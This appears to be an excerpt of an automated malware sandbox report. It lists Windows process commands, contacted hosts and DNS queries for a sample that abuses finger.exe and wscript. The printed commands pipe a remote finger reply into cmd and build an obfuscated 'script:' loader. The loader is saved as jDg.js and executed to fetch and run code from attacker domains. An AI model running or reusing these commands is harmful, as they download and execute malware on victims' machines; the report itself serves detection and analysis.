Technical Information
- '<SYSTEM32>\finger.exe' ok@t4opw7faa89.devryone.buzz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\jDg.js"
- %LOCALAPPDATA%\jdg.js
- 't4######a89.devryone.buzz':79
- 'v8####.#yghbsqgcxsxu.golf':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 't4######a89.devryone.buzz':79
- 'cl###flare.com':443
- DNS ASK t4######a89.devryone.buzz
- DNS ASK v8####.#yghbsqgcxsxu.golf
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@t4opw7faa89.devryone.buzz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt CGDX=.j&&SEt MSYMV=vq0pZarq0pZ a =q0pZ 'scq0pZriq0pZptq0pZ:'; b =q0pZ 'hq0pZTtPq0pZ:'; Gq0pZetq0pZObjq0pZecq0pZt(q0pZa+b+'&&sET SN5J=VQAWSVQAWSv8oudx.cyghbsqgcxsxu.golfVQAWS?1VQAWS'...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 4ZLY4="%MSYMV:q0pZ=%%SN5J:VQAWS=/%" 0<nul 1>%LOCALAPPDATA%\jDg%CGDX%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\jDg%CGDX%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\jDg.js